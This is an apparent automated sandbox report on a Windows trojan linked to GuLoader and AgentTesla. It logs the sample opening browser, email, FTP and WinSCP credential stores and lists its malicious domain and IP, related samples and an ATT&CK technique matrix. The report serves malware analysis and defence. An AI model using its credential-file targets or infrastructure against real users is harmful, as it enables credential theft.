            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198984Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198875Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198766Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198656Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198545Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198437Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198328Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198219Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198109Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198000Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197891Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197781Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197672Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197562Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197453Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197342Jump to behavior
            Source: 3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052CE000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeAPI call chain: ExitProcess graph end nodegraph_0-4185
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeAPI call chain: ExitProcess graph end nodegraph_0-4335
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess created: C:\Users\user\Desktop\3Pd480eWHA.exe "C:\Users\user\Desktop\3Pd480eWHA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeQueries volume information: C:\Users\user\Desktop\3Pd480eWHA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_00405D2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D2E
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 3Pd480eWHA.exe PID: 3260, type: MEMORYSTR
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 3Pd480eWHA.exe PID: 3260, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 3Pd480eWHA.exe PID: 3260, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            226
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            1
            Credentials in Registry
            1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS311
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            3Pd480eWHA.exe55%ReversingLabsWin32.Trojan.Guloader
            3Pd480eWHA.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsn1341.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://mail.showpiece.trillennium.biz0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.16.206
            truefalse
              high
              drive.usercontent.google.com
              142.250.186.129
              truefalse
                high
                api.ipify.org
                104.26.13.205
                truefalse
                  high
                  showpiece.trillennium.biz
                  67.23.226.139
                  truetrue
                    unknown
                    mail.showpiece.trillennium.biz
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://showpiece.trillennium.biz3Pd480eWHA.exe, 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://api.ipify.org3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://nsis.sf.net/NSIS_Error3Pd480eWHA.exefalse
                              high
                              http://r11.o.lencr.org0#3Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://mail.showpiece.trillennium.biz3Pd480eWHA.exe, 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://drive.google.com/3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://x1.c.lencr.org/03Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://x1.i.lencr.org/03Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/.3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/3Pd480eWHA.exe, 00000009.00000002.2500614547.00000000052CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://apis.google.com3Pd480eWHA.exe, 00000009.00000003.1969573580.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000003.1969167154.00000000052E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://nsis.sf.net/NSIS_ErrorError3Pd480eWHA.exefalse
                                              high
                                              https://api.ipify.org/t3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3Pd480eWHA.exe, 00000009.00000002.2521682008.00000000357F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://r11.i.lencr.org/03Pd480eWHA.exe, 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.0000000037A12000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2522820878.00000000379E5000.00000004.00000020.00020000.00000000.sdmp, 3Pd480eWHA.exe, 00000009.00000002.2500614547.0000000005278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    142.250.186.129
                                                    drive.usercontent.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    67.23.226.139
                                                    showpiece.trillennium.bizUnited States
                                                    33182DIMENOCUStrue
                                                    172.217.16.206
                                                    drive.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    104.26.13.205
                                                    api.ipify.orgUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1550181
                                                    Start date and time:2024-11-06 15:05:07 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 43s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:3Pd480eWHA.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:0c2b883b2bff3ab75adf1d79049fffe5de810c19cb65e1b3a4e14d73ca10598c.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@3/11@4/4
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 165
                                                    • Number of non-executed functions: 73
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: 3Pd480eWHA.exe
                                                    TimeTypeDescription
                                                    10:44:44API Interceptor5020x Sleep call for process: 3Pd480eWHA.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    67.23.226.139Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                PI 22_8_2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  COTIZACION 19 08 24.exeGet hashmaliciousAgentTeslaBrowse
                                                                    pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                      invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                        104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                        • api.ipify.org/
                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                        • api.ipify.org/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        api.ipify.orgNew_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                        • 104.26.13.205
                                                                        JkYvyHHOr8.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 104.26.12.205
                                                                        y4jxkrdxZr.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 104.26.13.205
                                                                        Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        https://averellharriman.sharefile.com/public/share/web-sab7e0a816d3e4e0ca3a0899254901a6dGet hashmaliciousUnknownBrowse
                                                                        • 172.67.74.152
                                                                        https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Get hashmaliciousUnknownBrowse
                                                                        • 104.26.13.205
                                                                        https://www.canva.com/design/DAGVnZ3mr_Y/4CQQbX1-EKRcha16TVbYxQ/view?utm_content=DAGVnZ3mr_Y&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousMamba2FABrowse
                                                                        • 104.26.12.205
                                                                        Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                        • 172.67.74.152
                                                                        H096Ewc7ki.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUS6ehOuQ8ifL.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.5.155
                                                                        Iamgold_Docs_Access3aecd483-6211-46f6-ad1d-bba6268615a6_OFZCB.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 188.114.96.3
                                                                        Report_7526.htmlGet hashmaliciousUnknownBrowse
                                                                        • 104.17.245.203
                                                                        https://booking.com@slongre.com/vrmcoabuGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        SecuriteInfo.com.W32.MSIL_Kryptik.KHA.gen.Eldorado.19300.19769.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.16.142
                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                        • 172.67.133.135
                                                                        SecuriteInfo.com.Win32.CrypterX-gen.28162.4666.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                        • 104.21.13.207
                                                                        DIMENOCUSQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 67.23.226.139
                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brGet hashmaliciousHTMLPhisherBrowse
                                                                        • 107.161.183.172
                                                                        http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 107.161.183.172
                                                                        nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.73.163.173
                                                                        rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 138.128.178.242
                                                                        bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 98.142.105.97
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0e6ehOuQ8ifL.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                        • 104.26.13.205
                                                                        173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.26.13.205
                                                                        pagamento.Intesa.anpaolo.pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.26.13.205
                                                                        pagamento.Intesa.anpaolo.pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.26.13.205
                                                                        SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 104.26.13.205
                                                                        Iamgold_Docs_Access3aecd483-6211-46f6-ad1d-bba6268615a6_OFZCB.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.26.13.205
                                                                        tvfF5APmrC.lnkGet hashmaliciousMalLnkBrowse
                                                                        • 104.26.13.205
                                                                        aAmetcdeXM.lnkGet hashmaliciousMalLnkBrowse
                                                                        • 104.26.13.205
                                                                        PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 104.26.13.205
                                                                        37f463bf4616ecd445d4a1937da06e19N2DJ1eUIE6.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        NTU #U5831#U50f9#U8acb#U6c42#U9805#U76ee FMD2024UOS#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 142.250.186.129
                                                                        • 172.217.16.206
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\nsn1341.tmp\System.dllPO 20240949.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          PO 20240949.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            PO-10212024168877 PNG2023-W101.exeGet hashmaliciousGuLoaderBrowse
                                                                              PO-10212024168877 PNG2023-W101.exeGet hashmaliciousGuLoaderBrowse
                                                                                PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                  PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                    SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exeGet hashmaliciousUnknownBrowse
                                                                                      cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse
                                                                                          cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):11264
                                                                                            Entropy (8bit):5.770803561213006
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
                                                                                            MD5:2AE993A2FFEC0C137EB51C8832691BCB
                                                                                            SHA1:98E0B37B7C14890F8A599F35678AF5E9435906E1
                                                                                            SHA-256:681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
                                                                                            SHA-512:2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: PO 20240949.exe, Detection: malicious, Browse
                                                                                            • Filename: PO 20240949.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-10212024168877 PNG2023-W101.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-10212024168877 PNG2023-W101.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-000041522.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-000041522.exe, Detection: malicious, Browse
